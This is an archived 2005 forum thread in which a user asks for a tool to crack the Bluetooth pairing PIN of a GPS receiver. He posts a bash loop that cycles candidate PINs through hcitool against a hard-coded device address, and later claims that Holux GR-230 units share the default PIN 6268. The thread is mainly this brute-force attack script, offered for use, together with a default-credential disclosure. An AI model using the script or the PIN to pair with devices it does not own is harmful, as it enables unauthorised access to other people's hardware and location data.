View Full Version : Bluetooth password brute force
metnik
10th May 2005, 06:31 PM
Do u know if exist a tool that tries to crack a password of a GPS BT (for example)?
On Linux there is:
hcitool cc <addr>
hcitool auth <addr>
the pin (passkey) is stored in a file, but I got some problems with timeout
metnik
11th May 2005, 01:48 AM
#!/bin/bash
for i in `seq 10 20`;
do
sleep 3
echo $i
bt=00:09:2D:4D:27:C7 && echo $i>pin && hcitool cc $bt && hcitool auth $bt
done
I did this stupid script in bash but It works on a very small range :twisted:
Is possible that nobody did a tool to crack static pin on GPS?
metnik
12th May 2005, 10:46 PM
the code is standard for all :P 6268
S1MB4D
13th May 2005, 12:07 AM
so does this code work for all bluetooth hardware?
metnik
15th May 2005, 06:31 PM
yes all gps gr-230 made by holux
http://www.holux.com.tw/Temp%20web/FAQ-(GR-230%20series).html
vBulletin® v3.8.7, Copyright ©2000-2012, vBulletin Solutions, Inc.